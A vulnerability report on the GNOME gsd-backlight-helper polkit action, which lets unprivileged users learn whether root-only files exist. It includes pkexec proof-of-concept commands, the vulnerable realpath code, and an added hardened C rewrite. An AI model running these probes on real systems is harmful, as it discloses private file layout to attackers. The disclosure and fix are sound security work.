Polkit policy for backlight helper discloses information on the system
Original reporter: Generation of Error Message in gsd-backlight-helper Leading to An Information Disclosure Vulnerability
Area: Application
Message
Hi,
I found an information disclosure vulnerability in the PolicyKit action org.gnome.settings-daemon.plugins.power.backlight-helper
user@ubuntu:~$ pkaction --verbose --action-id org.gnome.settings-daemon.plugins.power.backlight-helper
org.gnome.settings-daemon.plugins.power.backlight-helper:
description: Modify the laptop brightness
message: Authentication is required to modify the laptop brightness
vendor: GNOME Settings Daemon
vendor_url: http://git.gnome.org/browse/gnome-settings-daemon
icon: battery
implicit any: no
implicit inactive: no
implicit active: yes
annotation: org.freedesktop.policykit.exec.path -> /usr/libexec/gsd-backlight-helper
As the above shows, an unprivileged attacker can execute /usr/libexec/gsd-backlight-helper
as root without authentication in an active session.
This binary needs two arguments. The first argument is the backlight directory and attackers can supply a full path to any arbitrary file. According to the error message, an unprivileged user can check for the existence of any files on the system as root. The following is an example:
$ id
uid=1000(user) gid=1000(user) groups=1000(user)
$ pkexec /usr/libexec/gsd-backlight-helper /root/.bashrc 111
Error: Could not find the specified backlight "/root/.bashrc"
$ pkexec /usr/libexec/gsd-backlight-helper /root/not_exist 111
Error: Could not canonicalize given path (2: No such file or directory)
# some unprivileged user should set the $SHELL environment to run pkexec
$ id ; echo $SHELL
uid=65534(nobody) gid=65534(nogroup) groups=65534(nogroup)
/usr/sbin/nologin
$ pkexec /usr/libexec/gsd-backlight-helper /root/.bashrc 111
The value for the SHELL variable was not found the /etc/shells file
This incident has been reported.
$ SHELL=/bin/sh pkexec /usr/libexec/gsd-backlight-helper /root/.bashrc 111
Error: Could not find the specified backlight "/root/.bashrc"
$ SHELL=/bin/sh pkexec /usr/libexec/gsd-backlight-helper /root/not_exist 111
Error: Could not canonicalize given path (2: No such file or directory)
I paste the vulnerable code below (https://github.com/GNOME/gnome-settings-daemon/blob/master/plugins/power/gsd-backlight-helper.c#L88-L93). When the attacker-controlled file doesn't exist, realpath will return NULL, thus resulting in a different error message from the one printed when the file exists.
    /* argv[1] is caller-controlled; realpath() resolves it as root */
    device = realpath (argv[1], NULL);
    if (device == NULL) {
        /* only reached when the path does not resolve, so the message differs from the "could not find backlight" case */
        fprintf (stderr, "Error: Could not canonicalize given path (%d: %s)\n", errno, strerror (errno));
        result = GSD_BACKLIGHT_HELPER_EXIT_CODE_FAILED;
        goto done;
    }
Here is my test environment:
user@ubuntu:~$ lsb_release -rd
Description: Ubuntu 20.04.2 LTS
Release: 20.04
user@ubuntu:~$ apt-cache policy gnome-settings-daemon
gnome-settings-daemon:
Installed: 3.36.1-0ubuntu1
Candidate: 3.36.1-0ubuntu1
Version table:
*** 3.36.1-0ubuntu1 500
500 http://mirrors.ustc.edu.cn/ubuntu focal-updates/main amd64 Packages
100 /var/lib/dpkg/status
3.36.0-1ubuntu2 500
500 http://mirrors.ustc.edu.cn/ubuntu focal/main amd64 Packages
Best Regards,
Aobo Wang
Chaitin Tech.
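The following is an added example, not code from the report above and not gsd-backlight-helper's own code. It shows one way a pkexec-launched helper can take the backlight argument without turning its error path into a file-existence oracle: the caller may only name a device, the helper builds the sysfs path itself, and every failure (rejected name, failed realpath(), resolved path outside sysfs) produces one uniform message. The directory prefixes /sys/class/backlight/ and /sys/devices/, the error string, and the function names are assumptions for illustration.

```c
/* Added example (not the GNOME project's code and not from the report):
 * a hardened way for a pkexec helper to accept a backlight device.
 * The reported snippet hands argv[1] straight to realpath() and prints a
 * different message depending on whether the file exists. Here the caller
 * may only supply a bare device name, and all failures look the same. */
#define _DEFAULT_SOURCE
#include <ctype.h>
#include <limits.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Assumed locations: the class directory whose entries the caller may name,
 * and the prefix those entries resolve to through sysfs symlinks. */
#define BACKLIGHT_CLASS_DIR "/sys/class/backlight/"
#define SYSFS_DEVICES_PREFIX "/sys/devices/"
#define UNIFORM_ERROR "Error: Could not find the specified backlight\n"

/* Accept only a bare device name: non-empty, shorter than NAME_MAX, not "."
 * or "..", and only characters that occur in sysfs device names (so no '/'). */
int backlight_name_is_valid(const char *name)
{
    size_t len, i;

    if (name == NULL)
        return 0;
    len = strlen(name);
    if (len == 0 || len >= NAME_MAX)
        return 0;
    if (strcmp(name, ".") == 0 || strcmp(name, "..") == 0)
        return 0;
    for (i = 0; i < len; i++) {
        unsigned char c = (unsigned char)name[i];
        if (!(isalnum(c) || c == '_' || c == '-' || c == '.' || c == ':'))
            return 0;
    }
    return 1;
}

/* Build BACKLIGHT_CLASS_DIR + name into out. Returns 0 on success, -1 if the
 * name is rejected or does not fit. Touches no files at all. */
int build_backlight_path(const char *name, char *out, size_t out_len)
{
    int n;

    if (!backlight_name_is_valid(name))
        return -1;
    n = snprintf(out, out_len, BACKLIGHT_CLASS_DIR "%s", name);
    if (n < 0 || (size_t)n >= out_len)
        return -1;
    return 0;
}

/* Helper for checks: 1 if name builds to exactly expected, else 0. */
int backlight_path_equals(const char *name, const char *expected)
{
    char buf[PATH_MAX];

    if (build_backlight_path(name, buf, sizeof buf) != 0)
        return 0;
    return strcmp(buf, expected) == 0;
}

/* Resolve the device directory. A rejected name, a failed realpath() and a
 * resolved path outside SYSFS_DEVICES_PREFIX all yield the same message, so
 * nothing about other files is disclosed. Returns a malloc'd path or NULL. */
char *resolve_backlight_device(const char *name)
{
    char candidate[PATH_MAX];
    char *resolved;

    if (build_backlight_path(name, candidate, sizeof candidate) != 0) {
        fputs(UNIFORM_ERROR, stderr);
        return NULL;
    }
    resolved = realpath(candidate, NULL);
    if (resolved == NULL ||
        strncmp(resolved, SYSFS_DEVICES_PREFIX, strlen(SYSFS_DEVICES_PREFIX)) != 0) {
        free(resolved);                    /* free(NULL) is a no-op */
        fputs(UNIFORM_ERROR, stderr);
        return NULL;
    }
    return resolved;
}

int main(int argc, char **argv)
{
    char *device;

    if (argc != 2) {
        fprintf(stderr, "usage: %s <backlight-device-name>\n", argv[0]);
        return 1;
    }
    device = resolve_backlight_device(argv[1]);
    if (device == NULL)
        return 1;
    printf("%s\n", device);
    free(device);
    return 0;
}
```

Run as `./helper intel_backlight` on a laptop and it prints the resolved sysfs device directory; `./helper /root/.bashrc` and `./helper no_such_device` both print the same single line to stderr and exit 1. The alternative mitigation, changing the polkit action's implicit active authorization from yes to auth_admin_keep, would also close the oracle but would prompt for a password on every brightness key press, which is why restricting the helper's input is the more usual fix.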